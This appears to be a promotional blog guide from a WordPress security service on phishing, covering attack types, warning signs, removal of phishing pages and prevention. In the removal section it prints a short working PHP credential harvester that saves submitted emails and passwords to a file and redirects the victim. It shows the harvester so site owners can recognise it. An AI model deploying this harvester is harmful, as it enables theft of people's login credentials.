WordPress Phishing Attack – How to Remove Phishing From Site

WordPress Phishing Removal

Remove phishing from wordpress site - complete guide

Although technical security measures are constantly improving, WordPress phishing remains one of the most economical and simple ways that hackers have at their disposal to access sensitive information.

Just click on a link (as easy as that) to be able to share private information and victim of identity theft.

A recent report indicates that WordPress site administrators are becoming the target of a global phishing campaigns that target user credentials. It is orchestrated by an unknown criminal collective, its main objective seems to be the acquisition of sensitive information by forcing the targets by revealing them voluntarily.

To know how to protect yourself, you have to understand what is a phishing attack, what are the types and how you can recognize it and how to remove phishing pages from wordpress site. Keep reading, we help you avoid security problems arising from this attack.

Web Phishing Statistics 2020-2022

phishing statistics

What is a phishing attack?

What is a phishing attack?

Phishing is an online scam with which hackers pretend to be legitimate entities to deceive victims and get them to share sensitive information or install malware.

The “phishing” is a term derived from “fishing” since in both cases someone throws a bait and waits for the person or fish to “bite.” Frequently, hackers do it through malicious emails that seem to come from trusted senders and that include a link that apparently takes you to the company’s website. When you fill in the data, that sensitive information may be subject to theft.

This data can be valuable private information, such as login credentials (email and password), bank details (credit card information or credentials to access your bank) or even personal data (date of birth, address or number of social security). Phishing is considered a type of social engineering attack because it is based on human failures, not hardware or software errors.

Phishing is a social engineering technique used by criminals to obtain confidential information such as usernames, passwords and credit card details by masquerading as a trustworthy and legitimate communication.

The Phishing scenario is generally associated with the ability to duplicate a web page to make the visitors believe that it is on the original website, rather than the fake one. The deception is usually carried out through email and often these emails contain links to a fake website that looks almost identical to a legitimate site. Once on the fake site, unsuspecting users are tricked into entering their confidential data, which provides criminals with ample scope for scams and scams with the information obtained.

Phishing TRENDS OVER YEARS 2019 2020

 Social Engineering

Example of recent phishing attack


Recently the U.S. Computer Emergency Readiness Team issued an alert of phishing campaigns targeting airline consumers. here the attacker impersonated a travel agency or someone inside a company. In this kind of attack, Recipients are told an email contains an airline ticket or e-ticket, aviation-themed phishing attacks contain links to spoofed airline sites, threat actors personalize the phishing page in a way to trick victims into providing business information. Such phishing messages are pretended to be sent from a travel agency or a someone inside the target firm, they include a malicious link.

What information are Phishers after?

Phishers are interested in gathering information which, by nature, is private and/or confidential, especially if this information can help them steal your identity.

It targets a wide array of information, including

  • Social Security Numbers.
  • Driver’s License Numbers.
  • Date and Place of Birth.
  • Mother’s Maiden Name.
  • Account Numbers.
  • PINs.
  • Usernames.
  • Passwords.
  • Personal Information.
  • Any confidential information that criminals can either directly use or resell.

How does a phishing attack work?

A basic phishing attack attempts to trick a user into entering personal data or other confidential information. Some 3700 million people send 269 billion emails every day. That makes it the ideal channel for cybercriminals. Imagine if 1% of those emails are a scam, and 1% of that percentage works. That means that 26.9 million attempts a day are successful.

We assure you that more than 1% of the emails that are sent are a scam, but we would like to help you so that even 1% won’t get through.

A phishing attack can have a particular objective, such as people who use a specific product, or it can be generalized, aimed at the general public with fake contests and prizes. In both cases, victims are asked to enter their names, email addresses and, in some cases, passwords and bank information.

Another option is that the email contains a malicious attachment that you are asked to download. In many cases, the malicious payload will be hidden within a Microsoft Word document that requires the user to enable macros to function. When you try to open the document, you are asked to update the software or give certain permissions to view the document correctly. And if you accept, you are probably opening a serious security breach by yourself.

Examples of  phishing scams/attacks/emails

phishing example

WordPress Phishing

We know that WordPress powers >40% of the web and is by far the largest content management system (CMS). Therefore it makes a good target for hackers to exploit the vulnerabilities in WordPress. Do you know that WordPress Phishing Scams Can Fool Even WordPress Pros. For those that manage multiple WordPress sites, their email is bombarded with emails from those sites.

Even the best WordPress user can be fooled when the email is so familiar and looks like what they might receive on a regular basis.

Most attackers use a WordPress site as a magnet to distribute malware via WordPress phishing hack. The hacker uses the WordPress site as a cover. This is the most used tactic, but threat actors can also use WordPress phishing attacks against website administrators to get access to the site to steal PPI (protected personal information).

The majority of WordPress administrators have no idea that phishing pages are on the site. The files are not included with the legitimate WordPress phishing pages, and the website doesn’t appear to be different. They are hidden from the visible eye. So, you may only learn the pages are there when you get a notification from someone who received the phishing email.

Phishing attacks at WordPress sites

This attack differs from previous phishing campaigns in the use of an email designed to resemble a legitimate WordPress request, in which users are requested to update their database immediately.

A new phishing attack targeting WordPress sites uses fake database update messages to cause serious problems for site owners. According to the research by our WP experts, unlike previous phishing campaigns, it uses an email designed to resemble a legitimate WordPress request that asks users to update their database immediately.

Using style and font options similar to actual WordPress updates, along with a footer that resembles that of the parent company Automattic, scammers try to attract users to click on the “Update” button. Next, they are asked for their username and password, followed by a request for the name of the website and the name of the administrator. Of course, emails include multiple grammatical errors in the body of the email and the mention of an impending “deadline”, none of which is consistent with WordPress or hosting providers in general.

wordpress phishing attack - database_upgrade_phishing_message.

When hackers collect usernames, passwords and website addresses, they have everything they need to deface site content and send malware to the users. In addition, full access to WordPress sites allows malicious actors to install a backdoor in wordpress, allowing them to enter the site whenever they want. As a result, companies may experience a sudden drop in site traffic or discover that they have been blacklisted by popular search services.

Why WordPress is so Vulnerable?

With over 47 thousand plugins in the official WordPress repository and thousands more available on various other marketplaces and sites, finding those that work well is a daunting task. Finding secure WordPress plugins that won’t endanger your site is an even harder task due to the complex nature of WordPress security and often massive plugins with thousands of lines of code.

Although we can’t help you avoid every single bad plugin. We’re just introducing you with the fact that much of the activity in violation of these sites is through the plugin. The plugins are convenient and connect systems and allow them to communicate. But not all plugins have the same security protocols. Hackers just need a weak link to find a way to access the application.

It’s not that WordPress didn’t anticipate that the risk would only increase. Its founder talked about it in 2007. WordPress sites have more than 82,000 more spam incidents per hour than a decade earlier. There is a plethora of wordpress hacks which are widespread these days. Some of the most common ones are WordPress XSS attack, WordPress malware redirection hack, Japanese keyword hack, WordPress pharma hack, WordPress Brute Force Attack and many more.

Types of WordPress Phishing Scams

There are two ways of phishing attacks which can impact WordPress users. First, your site can be compromised in two ways: hackers are using your WordPress site to target others, or administrators receive phishing emails.

The purpose of phishing is to obtain confidential information. Start with some kind of communication with links. Sounds legitimate, but this single click is enough for the “hook” to work. This link leads to an infected page, which could be on your website, and you don’t even know it.

WordPress Phishing Pages

Most attackers use a WordPress site as a magnet to distribute malware through phishing. The hacker uses the WordPress site as a cover. This is the most widely used tactic, but threat actors can also use phishing tactics against website administrators to gain access to the site to steal PPI (protected personal information).

Most WordPress administrators have no idea that there are phishing pages on the site. The files are not included with the legitimate pages and the website does not seem to be different. They are hidden, therefore, you may only know that the pages are there when you receive a notification from someone who received the phishing email.

WordPress Phishing Emails

A form of attack in which the WordPress site administrators receive a phishing email that looks exactly like a notification they may have received many times a day. Such a type of phishing mail can easily fool the novice and even professional users as well.

For those that manage multiple WordPress sites, their email is bombarded with emails from those sites. So, if we confuse it with an official, it would be easy to click on it. An interesting thing that scammers will do is forward an email to look like a real person who sent the email and needs the reader’s attention.

That’s when recipients need to look closer. Asking questions like:

  • Do you know who the sender is?
  • Does the link redirects to the URL is known to you? It can also be a redirection hack

It is better to ask questions and do a quick search to see if this is really legitimate. Even the best WordPress user can be compromised when the email is so familiar and looks like what they might receive on a regular basis.

How to Find and Remove Phishing Pages From WordPress?

Remove Phishing Pages From WordPress

We can remove Phishing pages from wordpress site, manually as well as by using security plugins. These plugins can find the malware infections or scripts which lead to phishing. So how to find these and remove them? It is the code.

You should inspect the code to understand if your WordPress site has been hacked. These pages will be independent and buried within the CMS.

One way to find them is by name. Since a phishing scam is an effort to mimic your site to make it seem legitimate, file names give it away. The files will contain elements associated with your brand, but they will not be the pages that you have created.

The pages of fake websites are designed to look authentic. In many cases, you will arrive at a simple login or payment page, as they are very easy to recreate for many use cases and can be effective in capturing personal information.

 wordpress phishing scam page

Scanning each file on the site is not an effective way to find these pages. Download all the files from the site locally to analyze them one by one. The files you are looking for will probably be grouped.

They often have a directory name that has the name of the organization.

Once you find the corrupt files, delete them, but there are not just the pages.

Here are some samples of phishing attacks on the sites. Usually, there are numerous files, but this is the file that collects the data. Files may be obfuscated or not (intentionally obscured to make the code ambiguous). There is often more than one file.

<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.[redacted].com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>

There is also a related file, password.txt, collecting the phishing victim’s input.


Malicious code can be embedded in the shopping cart pages, redirecting customers to fake payment instead of the real one. You should also find a file called password.txt, which is there to collect information about hacking.

We often find phishing pages that have .htaccess files that block indexing by search engines, malware scanners, and even some hosting providers.


Find & Remove Phishing With a Plugin

There are number of wordpress security plugins avaialible which can scan and detect various instances of malicious code for you. You can go through our updated post on Best WordPress Security Plugins.

Remove Google Blacklist Warning on Unsafe Sites

Google blacklists more than 10,000 sites every day. It’s hard to focus on fixing your hacked website when not all of your visitors can access it.

If you get the google blacklist warning message when you open your website, it’s because it is blacklisted by Google, it has analyzed your website and detected harmful behaviour, which is due to presence of phishing pages on your wordpress site.

This large cover page in red is designed to prevent visitors from accessing your site. The red warning page links to another page describing the reasons why the website is blacklisted by Google, but here is another link for you to find out more.

  • To remove this Google warning so that you can restore your website.
  • Remove phishing using the tips we discussed earlier.
  • Then, inform Google to review your website and remove the black warning.
  • Usually, it takes 72 hours for Google to remove the blacklist.

If your website was involved in phishing, you’ll need to submit a  reconsideration request through Google Webmaster Tools .

Log in search console >> click on Search Traffic >> Manual Actions. Then submit a review.



Types of phishing attacks

It is easy to assume that virtually everyone has already received a phishing attack by email or has ended up on a suspicious website. There are many types of attacks and hackers are becoming more and more creative, so we must be aware of some of the new methods they use to get us off the alarm signal before they catch us.

Below we have listed some of the most popular types of attacks used today. The main difference between them is the method used and the objective. First, we will deepen the different objectives they pursue.

Spray and Pray

The spray and pray approach is the least complete type of phishing attack. In it, a mass message is sent to millions of users. These messages always show some kind of urgency, either indicating that it is an “important” email from your bank or a popular service or something of the type “you have won an iPhone last model. Claim it now.

Depending on the technical capabilities of the hacker, these attacks may not require false websites: victims are asked to respond to the attacker by email with sensitive information. They are usually ineffective but can be sent to a huge number of email addresses. It is not necessary that too many victims fall for the attacker to consider it a success.

In fact, you can address any type of objective, from a specific organization to a department or person of that organization to ensure the maximum opportunity for the email to open and thus be able to get more personal information. The higher profile cyber attacks usually come from this type of approach.

The message will be designed to look like someone wants to change your password due to a problem with the service. In this case, the message will seem legitimate (as close as possible to the original) and will redirect you to a page that will also look like the real one. These attacks are more effective because they are well planned.

The methods may vary depending on the objective. Spray and pray goals require less effort than spear phishing, for example. You don’t have to invest a lot to find a list of targeted emails, create custom landing pages, etc. As phishing has evolved, we see more and more methods that are not limited to email, but also include websites or social networks.

“Pharming” attack on the cache

This phishing method requires the hacker to create a website that impersonates a real one and, by exploiting vulnerabilities in the domain name system, matches the URL with the ip behind it. In fact, attackers could redirect traffic from the real site to the fake site. This is perhaps the most dangerous type of phishing because DNS records are not controlled by the end-user and that makes it more difficult to defend against this attack.

In this type of attack, hackers place clickable content on legitimate buttons. For example, a digital buyer might think that he is clicking on a button to make a purchase, but instead, download malware.

Other Types of phishing attacks includes:

  • Clone phishing
  • Domain spoofing
  • HTTPS phishing
  • Smishing
  • Spear phishing
  • Vishing
  • Watering hole phishing

How to recognize a phishing attack?

Top-Clicked Phishing Email Subjects

If an email or website seems suspicious to you, there are some details you can look at. Although some phishing campaigns are created to appear authentic, there are always clues that help us detect them easily. Let’s take a look at some of the details that could indicate that you are being the victim of a phishing attack and how to recognize a phishing scam.

The sender address

Check if you have ever received anything from the same sender. If the attacker has been smart enough, it will mask the sender’s address and the difference could be just a letter that you could ignore if you don’t look closely.

Misspelled domain names

If you have received a message that seems to come from the official account of a company (something like “Support@mailjet-com.Com”), confirm that the email address of this company is correct. Although the message seems legitimate, without spelling or grammar errors, with the correct format and company logo, it could be a fraudulent account.

One clue is to verify if the domain is slightly different than usual (like adding a suffix to the domain name). But most importantly, most legitimate brands will never ask you to give personal information by email.

Spelling and grammar mistakes

Many phishing attacks are not very well planned, especially those of the “Spray and pray” type, and the messages could contain spelling and grammar mistakes. It is unlikely that messages from large-scale organizations contain such errors. Therefore, poorly written messages are a clear indicator that the message may not be legitimate.

Attachments or suspicious links

It is very common for phishing messages to ask the user to click on a link that leads to a fake website designed for malicious purposes. The URL might seem legitimate, but there may be small errors such as missing or replaced letters.

If the message seems odd, it is always advisable to take a few seconds to examine the link carefully, hovering over it to see if the web address is different from the real one. You can always contact the brand using public email address or phone number before clicking on anything you think is suspicious.

Feeling of urgency

Many phishing attacks contain messages that warn of problems with your account or problems with a payment. This is because the attacker tries to get you to act quickly without thinking too much. In these cases, it is even more important to check the sender address and the links contained in the message.

The message is too good to be true.

We are sorry to burst the bubble, but most likely, any message that tells you that you have won a coupon or a prize is a phishing attack. We are sure that it will require more work than simply entering your personal information on a website, so be much more cautious and check all the data well.

Hey, if it turns out that you have really earned it, congratulations!

What should you do if you become a victim of a phishing attack?

If you have been the victim of a phishing attack, the first thing you have to do is change all your passwords immediately. Ideally, you change them all, not just the service that the attacker could have supplanted. It is alarming what you can do with a single login credential. Consider using a password manager in the future, to reduce the risk and make sure you have an antivirus solution with secure web browsing features installed and updated.

You should also contact the service provider that has been replicated in the phishing attack and follow its instructions.

what to do if you suspect phishing

how to deal with phishing emails

Tips To Prevent Web phishing Attack

  • Never reply to an unsolicited emails
  • Do not click on links directly from emails
  • Be alert of suspicious emails
  • Delete messages that are confirmed to be phishing
  • Do not send your personal information
  • Update software often
  • Always be cautious

Tips to prevent Web Phishing

  1. Ignore links in emails where they are asking you to log in to your account.
  2. Navigate to your account separately via your browser so you know you’re logging in to the correct account.
  3. Another way to know if you are really entering the original site, is that the web address of the page should start with https and not http, as is the custom. The final S gives us a high level of confidence that we are browsing a secure web page.
  4. It is a good habit to verify the digital certificate that is accessed by double-clicking on the status bar lock at the bottom of your browser (currently some browsers can also display it in the top navigation bar).
  5. Do not respond to requests for information that arrive by e-mail. When real companies need to contact us they have other ways of doing so, of which email will never be partly due to their inherent security problems.
  6. If you have questions about the legitimacy of a domain, telephone the company at a number you know in advance, never click on it.
  7. It is advisable to make a habit of examining the charges that are made to your accounts or credit cards to detect any unusual activity.
  8. Use our wordpress security scanner, it does not take care of the problem directly but can detect websites with Trojans or unauthorized or suspicious incoming/outgoing connections. It is also important that if you want to stay protected from such a threat such as those mentioned, scan your website using WP Hacked Help and let their team of experts fix hacked wordpess site for you.

Below is a fake page and an email that requests user sensitive data. These examples abound in any country, and unfortunately, the rate of users who are deceived is still high.

If you have received these types of messages just ignore them and teach those who consider appropriate the simple forms of prevention mentioned.

tips to prevent phishing

Tips to Protect Your WordPress Site From Phishing Attacks

Even if you have fixed the issue, there are chances of getting re-hacked by the phishing attackers in the future. We can easily avoid that by having a few basic security measures in place. Those are Spam links that need to be removed from reaching your users. But scammers are always trying to evade security, so it’s a good idea to add some additional protections.

These are the 6 steps you can take today to protect your or your site from phishing attacks:

1. Keep Your Website Updated

If your site has been created with WordPress, it is very important that you update it regularly. We explain why. Maybe your motto is “if it’s not broken, don’t fix it”. In many situations, this philosophy is commendable, but not when it comes to WordPress or software in general. Updates not only bring new features but they also fix security flaws. Skipping updates would literally mean that the security issues remain unpatched. You should ideally set aside an hour each week to update your websites. Alternatively, if you can afford to, you can hire a WordPress management agency to take care of updates.

2. Use an SSL Certificate

With an SSL certificate, your website can leverage the HTTPS protocol to securely transfer information between point A and B. This is crucial when transferring sensitive information, like credit card data on checkout pages and Personally Identifiable Information (PII) on login and contact forms.

It is now easier than ever to use HTTPS on your website. Beginners should start by having a conversation with their hosting company about what options they offer. There are paid SSL certificates as well as free ones.

3. Enforce Strong Login Credentials

The password is one of the main issues that we must keep an eye on when establishing security on your site made with WordPress. Many times it is we ourselves who do not take the necessary precautions to put a secure password for our user but there are other times, especially when we allow user registration on our site, that it is they who can generate a security hole with easy to guess passwords. A unique username and password will make it hard for hackers to crack your credentials.

4. Use a Security Plugin

For WordPress, we can use many plugins that make it easier for us every day. Some are aimed at improving the load of the web, SEO, social networks. But yes, we can also use the tools of this type to analyze malware and phishing attacks. Let’s name some of the main ones. These plugins can be used to protect us from spam or malicious files:

SecuPress is another plugin similar to the previous one. It is free, although in this case it should be mentioned that the options are more limited if we do not opt ​​for the paid version. Again we have a tool that allows us to perform a scan in search of possible threats that are on our site and thus be able to correct those errors.

It should be mentioned that not only does it perform analysis for malware, but also analyzes other aspects of the WordPress site, such as users or login details, possible damaged add-ons or themes. It also shows us different errors.

For many, malCure is one of the best free security plugins for WordPress. It is a complete threat scanner. It allows us to perform analysis to detect viruses and threats. We simply have to install it, register and we can start using it for free.

It is a simple complement to use with which we can control the security of our page. Its interface is similar to that of a traditional antivirus, where we can see the progress of the analysis, as well as the result once it ends. Among the options, we can perform an analysis of the database.

Having a security plugin is not negotiable. Whether your website attracts millions of visitors or a few hundred, hackers target all types of websites. A good security addon offers complete protection against phishing attacks and bots.

5. Employ Least Privileged Principles

The principle of least privilege contributes to the stability of WordPress. When the scope of changes a user can make is limited, it makes network resources, data, and servers easier to monitor and more reliable. Limiting access to the entire WordPress also prevents a possible flaw in one application from having an impact on other devices or applications, since even individuals with privileged access to the first system do not have access to others, which reduces the risk of a breach.

There are 6 user roles on a WordPress website – Administrator, Editor, Author, Contributor, Subscriber, and Superadmin. Every role comes with a certain power that can be abused if you are not allocating the roles properly.

The rest of the users have limited power to make modifications to the website. Ensure that only a few trustworthy people hold administrative power.

Need Help Removing Phishing Pages From WordPress

You can analyze and delete phishing manually. But as we said before, malicious or malicious code can be present anywhere on the site. It will take you forever to find them. In addition, there are chances of missing malware, which is often hidden in an intelligent way. Using a security plug-in guarantees a better result, but again, not all plugins are good at detecting a phishing attack. If you want to find hard-to-detect malware, WP Hacked Help is your best option.

Hackers are smart and they can infect WordPress websites with new types of malware or try to insert complicated codes. Since most security scanners scan for known malware, they do not detect new and complex malware. We have devoted years , helping WordPress administrators identify and fix phishing attacks from websites.

24/7 WP Security & Malware Removal
Is your site hacked or infected with malware? Let us get it fixed for you
Secure My Website(s)